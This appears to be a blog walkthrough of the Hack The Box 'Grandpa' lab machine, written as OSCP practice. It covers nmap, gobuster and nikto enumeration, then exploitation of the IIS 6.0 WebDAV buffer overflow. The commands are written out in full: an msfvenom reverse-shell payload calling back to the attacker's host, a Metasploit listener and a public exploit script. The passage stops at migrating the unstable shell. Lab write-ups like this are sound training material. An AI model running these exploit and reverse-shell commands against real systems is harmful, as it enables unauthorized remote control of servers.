Hack The Box: Grandpa Write-up (#35)

7 min readNov 14, 2020

This is my 35th box out of 42 boxes for OSCP preparation. I am doing my best learning and mastering the key skills for my upcoming OSCP exams by writing this series of blogs. So let’s begin.

Reconnaissance

As usual, run a full TCP scan.

nmap -sC -sV -O -p- -oA nmap/full 10.10.10.14

-sC: Default Nmap script
-sV: Service/version info
-O: Enable OS detection
-oA: Output scan results in 3 different formats
-p-: Scan all ports from 1–65535

We get the back the following result:

Port 80: — Running HTTP service, Microsoft IIS httpd 6.0.

Nmap scan report for 10.10.10.14
Host is up (0.0082s latency).PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
| http-methods: 
|_  Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
| http-ntlm-info: 
|   Target_Name: GRANPA
|   NetBIOS_Domain_Name: GRANPA
|   NetBIOS_Computer_Name: GRANPA
|   DNS_Domain_Name: granpa
|   DNS_Computer_Name: granpa
|_  Product_Version: 5.2.3790
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan: 
|   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|   WebDAV type: Unknown
|   Server Type: Microsoft-IIS/6.0
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
|_  Server Date: Thu, 10 Sep 2020 19:20:48 GMT

Before we begin let’s do a quick mental note.

The first thing we noticed from the Nmap result is ‘Allowed Methods’ for port 80. These methods are dangerous as they allow us to move, copy, delete and put files on the web server. It also running WebDAV protocol. If you have read my HTB Granny, you will realise this box is almost the same. One more thing to take note is Microsoft IIS 6.0 is associated with the Windows Server 2003 operating system.

Service Enumeration

Port 80 (HTTP service)

Let’s visit the page.

Nothing interesting here. Let’s run the gobuster scan.

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.14/ -t 50 -o gobuster.txt

-w: Wordlist
-u: URL of the target
-t: Number of thread
-o: Output file

We get back the following results.

http://10.10.10.14:80/_private (Status: 403) [Size: 1529]
http://10.10.10.14:80/_vti_bin (Status: 301) [Size: 158]
http://10.10.10.14:80/_vti_txt (Status: 403) [Size: 1529]
http://10.10.10.14:80/_vti_cnf (Status: 403) [Size: 1529]
http://10.10.10.14:80/_vti_log (Status: 403) [Size: 1529]
http://10.10.10.14:80/_vti_inf.html (Status: 200) [Size: 1754]
http://10.10.10.14:80/_vti_pvt (Status: 403) [Size: 1529]
http://10.10.10.14:80/_vti_bin/_vti_aut/author.dll (Status: 200) [Size: 195]
http://10.10.10.14:80/aspnet_client (Status: 403) [Size: 218]
http://10.10.10.14:80/_vti_bin/_vti_adm/admin.dll (Status: 200) [Size: 195]
http://10.10.10.14:80/_vti_bin/shtml.dll (Status: 200) [Size: 96]
http://10.10.10.14:80/images (Status: 301) [Size: 152]
http://10.10.10.14:80/Images (Status: 301) [Size: 152]
http://10.10.10.14:80/postinfo.html (Status: 200) [Size: 2440]

Look into the directories and files that gobuster found. We don’t find anything useful.

Let’s run the Nikto scan as well.

nikto -h 10.10.10.14

-h: Target IP.

We get back the following results.

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.14
+ Target Hostname:    10.10.10.14
+ Target Port:        80
+ Start Time:         2020-09-11 03:32:32 (GMT8)
---------------------------------------------------------------------------
+ Server: Microsoft-IIS/6.0
+ Retrieved microsoftofficewebserver header: 5.0_Pub
+ Retrieved x-powered-by header: ASP.NET
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'microsoftofficewebserver' found, with contents: 5.0_Pub
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-aspnet-version header: 1.1.4322
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Retrieved dasl header: <DAV:sql>
+ Retrieved dav header: 1, 2
+ Retrieved ms-author-via header: MS-FP/4.0,DAV
+ Uncommon header 'ms-author-via' found, with contents: MS-FP/4.0,DAV
+ Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH 
+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5647: HTTP method ('Allow' Header): 'MOVE' may allow clients to change file locations on the web server.
+ Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH 
+ OSVDB-5646: HTTP method ('Public' Header): 'DELETE' may allow clients to remove files on the web server.
+ OSVDB-397: HTTP method ('Public' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5647: HTTP method ('Public' Header): 'MOVE' may allow clients to change file locations on the web server.
+ WebDAV enabled (PROPFIND UNLOCK LOCK COPY PROPPATCH SEARCH MKCOL listed as allowed)
+ OSVDB-13431: PROPFIND HTTP verb may show the server's internal IP address: http://10.10.10.14/
+ OSVDB-396: /_vti_bin/shtml.exe: Attackers may be able to crash FrontPage by requesting a DOS device, like shtml.exe/aux.htm -- a DoS was not attempted.
+ OSVDB-3233: /postinfo.html: Microsoft FrontPage default file found.
+ OSVDB-3233: /_vti_inf.html: FrontPage/SharePoint is installed and reveals its version number (check HTML source for more information).
+ OSVDB-3500: /_vti_bin/fpcount.exe: Frontpage counter CGI has been found. FP Server version 97 allows remote users to execute arbitrary system commands, though a vulnerability in this version could not be confirmed. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1376. http://www.securityfocus.com/bid/2252.
+ OSVDB-67: /_vti_bin/shtml.dll/_vti_rpc: The anonymous FrontPage user is revealed through a crafted POST.
+ /_vti_bin/_vti_adm/admin.dll: FrontPage/SharePoint file found.
+ 8016 requests: 0 error(s) and 27 item(s) reported on remote host
+ End Time:           2020-09-11 03:54:51 (GMT8) (1339 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Nikto also confirmed the number of ‘Allowed HTTP Methods’. Let’s test PUT method to create a file on the web server. Since this server running Microsoft-IIS service web server, the type of file it executes are ASP and ASPX. We can use davtest tool to automate the type of files it can create on the web server using the PUT method. Let’s test it out.

davtest --url http://10.10.10.14

We get back the following results.

Unlike Granny, there are restrictions put in place that don’t allow us to create or upload files. So let’s move on to enumerate the IIS 6.0 version. Run the searchsploit on the web server version.

Microsoft IIS 6.0 is vulnerable to Buffer Overflow.

Due to instability of the shell using nc.exe, I’ll be solving this box using Metasploit.

Exploitation

A quick Google search for ‘WebDAV ‘ScStoragePathFromUrl’ Remote Buffer Overflow’ brought me to this page. It has an exploit code written in python. Let’s clone the repo on our Kali Linux.

git clone https://github.com/danigargu/explodingcan.git

Generate reverse shell payload.

msfvenom -p windows/meterpreter/reverse_tcp -f raw -v sc -e x86/alpha_mixed LHOST=10.10.14.31 LPORT=53 > shell

Next, start Metasploit.

msfconsole -q

Set up a multi handler listener.

Set lhost, lport and payload. Then run the listener.

Run the exploit.

python explodingcan.py http://10.10.10.14 shell

We get a meterpreter session opened.

If I enter the shell, after few seconds it exists back to meterpreter session. The shell is not stable. To solve this, we need to migrate the current PID to another with the same privilege. Let’s migrate it.